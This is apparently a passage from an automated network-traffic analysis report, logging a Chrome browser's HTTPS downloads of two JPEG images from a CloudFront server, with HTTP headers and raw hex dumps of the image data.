                                                                                                                          2025-01-13 21:01:22 UTC6916INData Raw: 72 b1 2a 2c 80 12 a5 86 c3 0e 2d 36 28 a5 71 d7 cd 03 98 5a 37 50 11 ae 16 56 07 c5 a2 b5 95 4e 2b 51 da d4 06 03 70 cf d5 72 ca ba 45 73 87 74 ae 75 51 1c 35 5a 08 5b 74 0d 73 50 3e 97 49 7c d0 48 96 c3 44 4d a3 3c 22 a6 53 0b d3 0f 34 0a 4e 88 9b 0f 40 8a 56 9b b9 03 b2 dc 14 0e 02 c3 44 0a c0 09 08 0f 60 34 52 86 03 77 91 e0 93 69 a3 4b 45 ce a1 54 ed 6c 30 31 7c 46 3f 35 f0 7e cf bb 1d 0c 7b ab 2a 41 6d fa 20 63 67 8d c4 b4 3d b7 56 02 5b 9a 68 78 0e 8a a3 c4 22 0f 40 3e 95 1f 9a b0 b1 af 84 e5 21 75 95 ce d4 87 9d 16 99 73 fe 39 76 6a 98 c2 e3 ca e9 83 8e f1 5e 28 2a 6a 8c 31 ba f1 c7 a7 99 5e ce 97 8f 53 77 ee f2 f5 3c 9b ba 88 9c 33 85 9c 42 b8 3d e0 f6 51 9c c7 c5 6f a8 e5 ec c7 c3 9f 4f c7 dd 97 9f 4e 86 e0 01 60 1a 01 c9 7c 8a fa 93 42 55 9b 46
                                                                                                                          Data Ascii: r*,-6(qZ7PVN+QprEstuQ5Z[tsP>I|HDM<"S4N@VD`4RwiKETl01|F?5~{*Am cg=V[hx"@>!us9vj^(*j1^Sw<3B=QoON`|BUF


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          144192.168.11.204997454.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:22 UTC413OUTGET /app/uploads/gthl/2024/07/17140151/IMG_1192-730x541.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:22 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 120264
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:23 GMT
                                                                                                                          Last-Modified: Wed, 17 Jul 2024 18:01:53 GMT
                                                                                                                          ETag: "222850dd1dced31817c2e8b8e25c79da"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 5451b84324d9bca0bdd03e4c4009ae10.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: pWmtYDFsxBACfrY_zPF6dShuPL3r-EyDd4B2P_S_iw0H83YyPoDjwQ==
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 23 ef 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0a 01 0f 00 02 00 00 00 06 00 00 00 86 01 10 00 02 00 00 00 12 00 00 00 8c 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 9e 01 1b 00 05 00 00 00 01 00 00 00 a6 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 21 00 00 00 ae 01 32 00 02 00 00 00 14 00 00 00 cf 87 69 00 04 00 00 00 01 00 00 00 e4 88 25 00 04 00 00 00 01 00 00 02 14 00 00 03 4c 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 34 20 50 72 6f 20 4d 61 78 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 30 37 3a 31 37 20 31 34 3a 30 31 3a 31
                                                                                                                          Data Ascii: JFIFHH#ExifMM*(1!2i%LAppleiPhone 14 Pro MaxHHAdobe Photoshop 24.0 (Macintosh)2024:07:17 14:01:1
                                                                                                                          2025-01-13 21:01:22 UTC13386INData Raw: 00 24 28 db 7f 95 00 08 51 bf eb 40 03 c9 eb 8a 00 1e cf 3e 46 80 04 c7 81 d2 98 04 ec cf 91 a5 43 03 b2 f3 5c d0 20 a6 31 91 b5 00 14 a6 7a 82 28 03 b9 11 57 07 39 14 01 dc a7 19 0d 40 02 06 01 e8 73 bf 5a 00 ec 6f 80 3e 94 00 07 99 49 c1 3f 0c d0 00 96 91 b6 22 80 00 47 be 4a e3 f2 a0 60 32 ab 74 dc d2 0b 38 aa e3 62 56 8a 10 52 aa 36 27 27 cf 14 50 c0 e5 62 47 74 50 00 ac 47 c4 7c a9 50 c1 28 09 fb 27 3f 0a 62 07 07 27 a8 a4 00 aa 36 d8 63 bd 00 08 07 1d 7d 69 80 19 65 19 18 c7 4a 00 e2 fb 8c 8c d2 00 a5 d4 0f b2 41 a0 00 24 37 81 a0 01 05 5b 62 71 40 06 00 0c ee 05 3a 00 32 b8 dc 8f a5 14 07 72 82 72 0f 4a 00 1c 6d de 00 e6 90 c0 c0 39 26 81 1c 63 f1 c6 3e 14 0e c0 e5 18 cf 41 f1 a0 00 23 27 62 68 1a 67 72 9f e2 fc 69 05 83 c8 d8 c9 02 80 b3 b9 36 cf
                                                                                                                          Data Ascii: $(Q@>FC\ 1z(W9@sZo>I?"GJ`2t8bVR6''PbGtPG|P('?b'6c}ieJA$7[bq@:2rrJm9&c>A#'bhgri6
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: ad ae 59 24 51 c9 05 e2 f2 48 84 80 4f dd 35 e6 e4 85 70 cd a1 2b e5 10 30 5c 5d 5b 12 26 59 18 7d d6 1b e4 7c 6b 15 68 d5 d3 1d 47 c4 72 5b b6 20 b2 12 4d e1 cc 83 35 4b 23 27 62 1b fb ac b7 b2 ad c6 a6 43 80 79 92 d6 31 b1 3e b8 a1 5b e4 1b ae 87 66 0b db cb e8 ec ac a3 ed b5 6b 91 cb 1c 6b f6 6d 53 c5 9b cb 6a d6 18 dc 9d 2e c8 94 94 55 b3 4c d2 78 1e cf 49 e1 63 a3 c0 43 4e ff 00 bd 92 72 37 92 61 f7 89 f2 f0 f8 57 af f6 b1 f4 f6 9e 4b d6 bf 57 93 3a e2 5d 1e 4e cc 5c 24 78 9a 06 2a c0 8f a8 3f 95 79 19 60 e2 7a f8 a6 a4 42 db 34 71 5b f6 73 2b f6 07 68 a6 03 3d 97 f6 1c 78 81 e7 59 59 ab 44 a5 bb dc 76 4a 12 2e d2 21 f7 94 f3 ae 3d 33 d3 eb 4d 26 43 1f 5b 5d 5b 18 9a 31 6f 3c 84 6e 55 54 22 7c c8 fd 4d 52 76 ba 25 91 b7 04 a5 bc f2 92 b1 28 84 a0 38
                                                                                                                          Data Ascii: Y$QHO5p+0\][&Y}|khGr[ M5K#'bCy1>[fkkmSj.ULxIcCNr7aWKW:]N\$x*?y`zB4q[s+h=xYYDvJ.!=3M&C[][1o<nUT"|MRv%(8
                                                                                                                          2025-01-13 21:01:22 UTC7370INData Raw: bc 03 d5 43 39 6d a3 96 26 46 19 56 18 23 f5 a6 9d 01 0d aa e9 72 5c d9 4d 61 38 2c 5e 3c c4 f8 d8 91 f6 4e 7c 37 eb 56 d2 92 a2 f1 c9 c2 56 87 3c 11 c2 b1 e9 16 62 5b 90 3d f6 50 1a 53 d7 97 fb 39 f4 ac ea b8 35 cb 95 cd 9d c4 32 c5 a7 ce 6f 64 88 cc f1 86 e4 50 dc b9 1c bb 8c f9 74 f9 e2 ae 1c aa 30 93 28 5c 7f ed 4e e3 46 b7 8f 4a 49 23 b7 bf bc 4e ec 11 60 fb ba 63 ed b9 f1 6c f4 1e 99 c7 4a ef d3 69 e2 dd 9c 5a 9c f4 b6 a3 18 99 da 49 4c 8e ec b3 1d db 9b 70 fb ef 9c d7 ab d1 e6 34 6a 3c 1d ac 26 ab a5 2d b4 b3 b8 9a 05 08 46 73 95 f0 6f 97 4a 45 c4 be f0 7f 1a de f0 cc fd db 89 24 b5 56 fd f5 b9 39 52 3c c7 91 a5 44 4f 1a 66 e9 a6 ea 16 fa b5 94 57 d6 af cf 14 a8 18 7a 7a 1a a4 f8 3c dc 90 71 93 16 fb f5 7e 0e 7f 25 1f da 4d a3 bd e6 9e e2 69 23 8a
                                                                                                                          Data Ascii: C9m&FV#r\Ma8,^<N|7VV<b[=PS952odPt0(\NFJI#N`clJiZILp4j<&-FsoJE$V9R<DOfWzz<q~%Mi#
                                                                                                                          2025-01-13 21:01:22 UTC15396INData Raw: c2 12 92 02 14 62 b4 4d c5 f2 8c 5a dd d3 1d 62 18 ad d6 49 19 54 22 96 76 f2 03 ad 61 29 3b 67 5c 31 c6 4a 29 76 79 e7 5d d7 93 88 35 8b bb de 70 7b 79 4b 22 f8 84 1b 28 fa 01 55 17 48 f4 62 88 0d 62 c6 ea cb 13 db 13 eb 8a b3 4a 21 e7 68 b5 19 01 74 0a 40 dc e7 c6 98 99 0d a9 e9 f1 2c 64 0c 13 d3 7d b3 40 88 0b cb 36 43 1a a4 9f e1 6e b5 2d 0d 11 d7 dd b2 73 4a 46 0a 8c 0c 1d b3 59 32 ca 7e a7 3f 6b 2e ea 15 87 52 2a 24 c9 64 97 0d a8 ec a6 39 00 93 81 9d aa e1 d0 bc 93 f6 aa e9 17 69 cc d9 73 9e b9 18 a6 cb 41 65 96 45 53 90 0f 37 a6 33 52 55 89 c3 70 d1 c6 bd d3 93 bf 5f 1a 06 8b 36 81 ac bd 9d ca 15 73 85 00 52 68 68 bf 25 f4 77 83 9a 5c 9d 81 23 ae 3c b1 50 52 29 3c 76 84 59 25 dc 59 66 b5 9d 64 c0 a6 4c ba 1d 9b c5 91 63 78 df 2d 2a 87 0b da f6 8f
                                                                                                                          Data Ascii: bMZbIT"va);g\1J)vy]5p{yK"(UHbbJ!ht@,d}@6Cn-sJFY2~?k.R*$d9isAeES73RUp_6sRhh%w\#<PR)<vY%YfdLcx-*
                                                                                                                          2025-01-13 21:01:22 UTC9988INData Raw: 5a 44 c6 4c 5f 4e ef c8 41 3d 06 d4 48 20 58 6c 51 b2 00 67 19 f2 63 59 33 54 5e 74 6d 26 fa 78 03 ae a5 7b 08 c6 7b ae 71 f9 d4 59 68 5e e6 d7 54 81 4f 67 72 2e 17 c4 98 90 37 e5 fa d2 b4 32 15 da 67 62 5d 87 30 ea 18 1c fe 75 42 3b 95 88 dd 15 87 a1 de 80 12 9e c6 d2 e9 81 b8 b7 cb 0d f9 b1 83 f5 14 d4 a8 54 5c 78 3f 8f db d9 86 b5 a3 ea b1 91 ee 77 32 3d a5 d8 3d 04 6c a3 0d fe 16 c1 f8 66 ae 09 bb a3 2c 9e 0b f7 01 f0 ee a7 c7 7a cd c7 14 71 34 be f9 22 4b 88 d9 88 68 c9 f3 51 d3 94 0c 63 1b 6e 2b 87 50 e4 b8 3d 6d 26 c5 1b 46 c2 ab 04 29 1a c6 f1 2a 85 0b ca 5b 1b d7 07 26 fc f2 9a 1e c6 a5 dc 0e cc 00 cb de 50 7a fa d5 a4 73 c9 a4 ae c4 6e ac a3 0a c8 e0 4b 1c 8b 8e 56 19 eb e7 fc ea 1c 5a e8 a5 3d ea 99 54 d5 34 43 63 20 92 0c bc 5d 4a f5 2b f3 f1
                                                                                                                          Data Ascii: ZDL_NA=H XlQgcY3T^tm&x{{qYh^TOgr.72gb]0uB;T\x?w2==lf,zq4"KhQcn+P=m&F)*[&PzsnKVZ=T4Cc ]J+
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: 1a 96 14 24 b7 68 0b b3 6c 7d 6a 6c a1 9a 4c ae cc 55 f3 93 e7 40 0f 2d a4 58 c1 51 9e a4 fc 85 0c 19 e9 ae 0a d2 ce 93 c3 9a 75 9b 2e 24 48 55 a4 fe fb 77 9b f1 26 be 7b 3c f7 64 6c f5 71 47 6c 12 2d 51 27 2c 5f 1a c0 d5 08 cf 18 e4 66 6d 80 a0 43 49 8b 3d 9b 45 11 c3 4b 80 1b c8 75 aa 0a 19 df 5b a5 b5 b4 70 2e 32 4e 58 e3 19 3f 0a 04 46 ce bb 63 e5 4c 4c ad 6a f6 85 d5 88 eb 5a a6 67 24 63 3e d6 41 6b 5b 6e 61 86 8e 52 3e a3 fc ab d0 d3 79 38 75 1e 0c e2 15 e6 95 17 ce ba 64 e9 18 e2 57 24 5e b4 1d 3f f7 19 23 d4 13 e3 5e 46 6c 9c 9e de 1c 7c 12 33 40 02 92 07 c3 3e 35 9a 66 ad 15 cb 2d 0c eb 7c 69 63 a5 99 56 15 ba 91 51 a4 27 18 5f 1c 7a e0 1c 7a d7 a5 8e 55 8a cf 2a 78 dc b3 28 fc 9e 9c b1 8a da de 08 6d ad 02 2c 10 22 c4 aa 3e e8 03 18 fc 2b ce 94
                                                                                                                          Data Ascii: $hl}jlLU@-XQu.$HUw&{<dlqGl-Q',_fmCI=EKu[p.2NX?FcLLjZg$c>Ak[naR>y8udW$^?#^Fl|3@>5f-|icVQ'_zzU*x(m,">+
                                                                                                                          2025-01-13 21:01:22 UTC12792INData Raw: ea 97 08 a2 4b b7 8f c0 a4 43 b3 fc ba f5 ab 58 e2 bc 0a d8 d7 f6 80 3b 9b 60 c4 f5 62 4e fe bd 69 ed 41 64 d8 86 24 3c a5 17 20 64 0c e0 1a 8b 64 d0 0f 1c 6e 47 78 05 1b e3 18 23 e5 46 e6 1b 50 58 d2 36 3d e0 d8 07 3d 7a d0 e4 c3 6a 16 05 79 83 00 13 ae 0e 3a 8f 85 45 8e 8e ec 91 bb cc c0 03 e0 4e 3e 74 05 0b 25 b2 96 5e 8c d9 dc 63 19 14 9b 1d 04 ec 54 31 28 39 97 19 cb 1e 95 4a 42 68 2b 82 a7 68 cb 7f 74 1c 55 92 07 7c 03 b8 18 19 ef 75 fa 51 40 28 92 b8 04 15 20 fe 14 ac 62 b0 c8 09 2e 5b bd 8e e8 c6 d9 a4 d8 50 a0 59 03 12 4b 1c ee 43 1a 76 02 c9 6c f2 92 54 a1 19 c1 24 63 6a 87 91 22 b6 8e 23 b4 44 df bc cc 30 70 3c 2a 1e 46 35 14 2c fc a8 a8 56 32 4e 7f 8b 1c b4 95 be c1 a0 8c b2 31 0b 95 04 9e 99 d8 9a b8 f0 20 f3 20 b7 d2 ee a7 2e a0 88 24 3d 73
                                                                                                                          Data Ascii: KCX;`bNiAd$< ddnGx#FPX6==zjy:EN>t%^cT1(9JBh+htU|uQ@( b.[PYKCvlT$cj"#D0p<*F5,V2N1 .$=s
                                                                                                                          2025-01-13 21:01:22 UTC6396INData Raw: 86 e6 66 94 8f b4 dd 3c 85 66 48 53 9e d4 6d 40 85 e3 93 2e 72 31 8d a9 8c 52 42 ab 13 7c 29 8c 69 24 aa 42 81 9c 8e b9 a9 62 b1 12 72 69 08 d1 bd 85 70 af fb 49 c6 91 ca e9 cd 0d 8a f6 9f fe 70 f7 53 e9 bb 7f 86 bc bf ab ea 3d 1d 3b ae df 07 6e 83 1e ec aa 4f a5 c9 ec 1f 7d 92 de 7f d9 d6 56 c9 3f 22 00 0f 38 41 b0 df 3b 7e 55 f1 78 34 32 cd ca 67 7e 4c 9f cd 21 78 a4 bb 66 67 ec e1 0e 17 23 94 10 47 a1 35 d3 1f a6 df 72 66 0f 2a f8 2b 5a 8e b9 69 6d a8 5a 6a 91 0b 99 d2 09 09 b9 11 61 41 e6 5c 67 27 03 e5 e3 e7 5e cb d3 41 e3 58 bc 13 ee 56 3f d1 35 9d 1b 59 d7 2e 66 d3 41 41 23 88 1d a4 05 19 f0 a0 a7 77 a1 fb e0 1c e7 d2 b9 7e a3 a2 8b c2 9a 7c a1 e3 9c 95 da 26 a2 86 e2 4e ea cf 0a 20 e8 c3 19 c6 3a e4 ed 5e 56 1d 16 39 73 27 46 99 27 5d 21 2b cd 46
                                                                                                                          Data Ascii: f<fHSm@.r1RB|)i$BbripIpS=;nO}V?"8A;~Ux42g~L!xfg#G5rf*+ZimZjaA\g'^AXV?5Y.fAA#w~|&N :^V9s'F']!+F
                                                                                                                          2025-01-13 21:01:22 UTC8404INData Raw: 96 48 80 5e d2 48 18 bb 0f ed 60 e0 d6 7b df c0 3c 11 63 cd 53 8d 62 d4 ee 16 f4 e9 96 06 eb 93 94 bb 5b b3 05 db 1d d1 e1 b0 f1 ce 37 c7 5a af 59 a5 c1 2b 4f 1f 2c ae dd 3c da 8c a6 69 8d c3 bb 7d e2 8c c4 fc 4b 64 fe 3b 54 e4 ca e5 d9 ac 20 a2 b8 10 58 e5 0a 39 63 b8 6f 0f b0 31 59 d7 ec aa 24 22 e1 2d 62 f2 21 3c 16 17 85 1b ef 72 00 3f f5 52 72 8a ed 85 32 d1 a5 fb de 83 a7 c1 63 aa 59 4f 03 35 c8 58 66 70 36 0c a7 2a 70 7c 4a 82 3f ce ae 0d 4b f1 32 9a 6b 96 3f 94 08 98 91 92 a7 72 b8 c6 0d 32 09 2d 0a ea 18 ef a2 69 01 29 19 e6 2a 7c 68 62 25 35 2b 9d 3e ee 45 b9 b3 77 b6 95 c9 e7 89 46 c4 e7 af fa f3 a9 12 fd 91 3c 51 79 77 a7 e9 ba ce a7 68 a5 a4 b3 b7 51 cf fc 05 99 63 0d f1 1c d9 f9 57 5e 8f 1e fc bc 98 6a 27 b6 27 9f 2e d8 4a 0e 37 23 c4 f8 d7
                                                                                                                          Data Ascii: H^H`{<cSb[7ZY+O,<i}Kd;T X9co1Y$"-b!<r?Rr2cYO5Xfp6*p|J?K2k?r2-i)*|hb%5+>EwF<QywhQcW^j''.J7#


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          145192.168.11.204997554.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:22 UTC413OUTGET /app/uploads/gthl/2024/06/28105107/0C9A9391-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:22 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 117751
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:23 GMT
                                                                                                                          Last-Modified: Fri, 28 Jun 2024 14:51:09 GMT
                                                                                                                          ETag: "7629a9e02fdd4eb994af9913381dfb63"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 924c3fd5fff04ef5cac09fbfc470e618.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: X96dG6mW0tTzb62taNFa_T2dQ-cVf5ySnw38rKaAjsJZsKoIJ46tRw==
                                                                                                                          2025-01-13 21:01:22 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 4a f4 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 37 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 30 36 3a 30 39 20 31 34 3a 34
                                                                                                                          Data Ascii: JFIFJExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 7.3 (Macintosh)2024:06:09 14:4
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: cc 4c 78 25 c5 bf 47 2b 26 68 f0 ed d5 e6 3e 72 ff 00 9c 73 b2 98 b5 c7 95 ae 7e a4 e0 55 74 cb 9a b4 1b 56 8b 1c a2 af 1d 7f ca f5 57 2e 9e 32 e3 42 41 e6 5f e1 ab 6b 7b 59 ec 2f 93 d3 bf 81 ca 5c 11 b9 46 56 2a db ff 00 c5 74 db f9 b2 12 c7 b7 9a 46 45 de 45 d7 b4 bd 03 cd 91 9d 42 40 f6 4e ad 6b 3c f0 37 21 1d 69 c6 65 2b d4 06 5f d9 fd 9c a4 61 27 76 e1 9c 02 f4 cf cc 6f 38 f9 5a 3d 32 d2 2f ad 9d 64 5d c9 1b b4 30 4b 1b 71 81 48 67 7a 80 14 33 d0 2a 72 f8 b2 32 c3 c4 cb 2e 5a 8e cc 97 c9 de 7e f2 8e b9 6f 1d b6 93 72 b1 49 1a 80 34 f9 69 1c ca 00 a5 02 9f b4 3f ca 4e 59 1f 0c c5 c0 36 c5 ff 00 33 2e 96 db ce 9a 14 ad b7 a5 25 b4 a0 f4 dc 4c ca 7f 03 99 fa 78 83 8a 57 f8 d9 90 99 aa 4f f5 13 69 a9 f9 86 ea eb 47 ba 59 a4 b4 11 43 a9 22 ef 1a ca 09 31
                                                                                                                          Data Ascii: Lx%G+&h>rs~UtVW.2BA_k{Y/\FV*tFEEB@Nk<7!ie+_a'vo8Z=2/d]0KqHgz3*r2.Z~orI4i?NY63.%LxWOiGYC"1
                                                                                                                          2025-01-13 21:01:22 UTC9842INData Raw: 75 72 61 74 69 6f 6e 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 53 68 61 64 6f 77 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 44 61 72 6b 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 4c 69 67 68 74 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 48 69 67 68 6c 69 67 68 74 73 3d 22 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 53 68 61 64 6f 77 53 70 6c 69 74 3d 22 32 35 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 4d 69 64 74 6f 6e 65 53 70 6c 69 74 3d 22 35 30 22 0a 20 20 20 63 72 73 3a 50 61 72 61 6d 65 74 72 69 63 48 69 67 68 6c 69 67 68 74 53 70 6c 69 74 3d 22 37 35 22 0a 20 20 20 63 72 73 3a 53 68 61 72 70 6e 65 73 73 3d 22 30 22 0a
                                                                                                                          Data Ascii: uration="0" crs:ParametricShadows="0" crs:ParametricDarks="0" crs:ParametricLights="0" crs:ParametricHighlights="0" crs:ParametricShadowSplit="25" crs:ParametricMidtoneSplit="50" crs:ParametricHighlightSplit="75" crs:Sharpness="0"
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 73 35 8e 0e ec f6 cf 87 15 6e 24 3e d1 78 46 f2 91 b2 fa 28 fe 35 e6 75 bf 51 c9 a9 75 d4 7e 0e f6 9b 49 1c 0a fb 65 c1 54 28 c0 e9 58 0d 21 a8 03 a8 03 a8 03 a8 03 a8 03 a8 03 a8 03 a8 03 a8 00 28 00 af f7 4d 57 93 a0 23 8f dd 6a e2 5f 0c b1 8e 2d 8e d5 a3 4a e9 8a 42 d3 5c 47 6d 0b cd 33 05 8d 14 b3 31 f0 02 ba 6e 6a 31 dc c8 09 2c f3 5d c5 0c b6 bc a9 1b f2 b7 34 80 e4 af c2 a2 a5 39 53 8a a4 31 ca 4a b2 17 50 41 64 3c ac 3c 8e 33 f9 11 56 a7 62 0d 4c 0e a0 0e a0 04 ee 6e 12 d6 07 99 f3 ca a3 c3 a9 f4 a5 29 6d 56 c6 95 f0 21 9b fe f8 1c 40 62 38 38 dc 30 aa 1b cd bb 8a a2 5e ca 1d 8a d0 40 ea 00 ea 00 ea 00 46 f2 ee 2b 1b 69 2e 66 60 b1 c6 32 49 a8 64 c8 b1 c5 c9 f8 1a 56 e8 a8 5e 71 bd dc f1 27 ea ab 74 ba 72 4b 37 77 93 ca a3 c0 fa d7 16 5f 52 cb 2f
                                                                                                                          Data Ascii: s5n$>xF(5uQu~IeT(X!(MW#j_-JB\Gm31nj1,]49S1JPAd<<3VbLn)mV!@b880^@F+i.f`2IdV^q'trK7w_R/
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: bb bf fc 8f 24 3d 0c 96 ba 23 27 bf 66 02 28 5d c4 2a a5 17 98 0e 62 a4 e4 82 47 5a d3 0c 49 73 2e ca 65 96 f8 5d 12 3c 1f aa 7e ac d6 a1 2e 7e c6 6f b2 90 1e 98 3e 3f 5a a3 5d 87 d4 c4 eb b5 c9 6e 97 26 c9 ff 00 33 45 e1 36 3a 7d ee a1 a2 37 dd 85 fb f8 33 fe 8d bc 3e 46 bc cf d4 23 be 30 ce bc f0 ff 00 9a 3a 78 7d ad c0 9c bb d4 ed ac 98 2c ce 41 3e 00 66 b9 4d d1 a6 31 72 e8 40 6b da 7b 29 63 3f 2a 8d f2 45 45 c9 12 78 a4 55 f8 d7 8d a6 d0 6f 2c 12 d2 e2 cd 6d e7 86 59 5e 49 14 be 79 79 76 1c a7 fb 55 6e 28 29 ba 64 76 90 eb c6 dc 51 7e a5 f4 9b 8d 02 e9 7f 75 d5 d1 87 c4 16 da b5 bd 0a 7d 30 e3 c8 de 6e 29 ed 31 41 2b a3 69 32 8f ec 73 1f fc 55 07 a0 61 ed 23 e5 e3 8e d2 62 25 9b 87 2d 36 f2 8d cf fe 2a 87 d8 b1 fb 06 97 5d a3 f6 88 62 1d e7 0f da 05
                                                                                                                          Data Ascii: $=#'f(]*bGZIs.e]<~.~o>?Z]n&3E6:}73>F#0:x},A>fM1r@k{)c?*EExUo,mY^IyyvUn()dvQ~u}0n)1A+i2sUa#b%-6*]b
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: bc 17 3f 01 f9 8a c7 8b a6 59 21 a6 ad 3f 71 72 36 eb e7 54 89 81 6f 76 48 d9 47 d6 9a 22 29 2d bd b6 a3 f6 77 36 b1 4b 91 8c b0 f0 f8 f5 a9 dd 00 7b 4d 1b 4d b0 97 bc b6 d3 e2 49 14 15 0c 06 e0 78 d4 5c 9f 90 a1 ff 00 b5 11 b7 26 3e 74 00 a4 73 73 fe ce 28 00 25 b8 e4 90 af 2e 7d 73 4c 18 5f 6b 1f ba 7e b4 08 89 e2 1d 0a cf 8a 6d 16 da e0 cd 04 88 dc f1 5c 42 dc b2 44 7c 79 4f a8 d8 d3 84 a9 80 f3 4b b7 b4 d2 2c 21 b1 b3 87 ba 82 05 08 aa 3c 05 0e db e4 43 af 6b 4f 23 48 05 51 c3 af 30 e8 45 3a 1a 12 7b c8 e3 0c cf 90 17 24 93 d3 6a 8b e0 71 4d ba 45 4f 55 d6 ac b5 89 a3 45 b0 8e eb ba 62 55 e6 1e ea e4 10 70 3c 72 09 1b f9 d5 4b 37 84 75 b0 fd 3f 8b 98 d1 2d 74 57 86 4b 3b bd 26 d5 2d e6 05 0f 73 18 4e 5c 8e b8 e8 6a 1e bc d3 b6 cb f2 68 20 e3 ed 14 d0
                                                                                                                          Data Ascii: ?Y!?qr6TovHG")-w6K{MMIx\&>tss(%.}sL_k~m\BD|yOK,!<CkO#HQ0E:{$jqMEOUEbUp<rK7u?-tWK;&-sN\jh
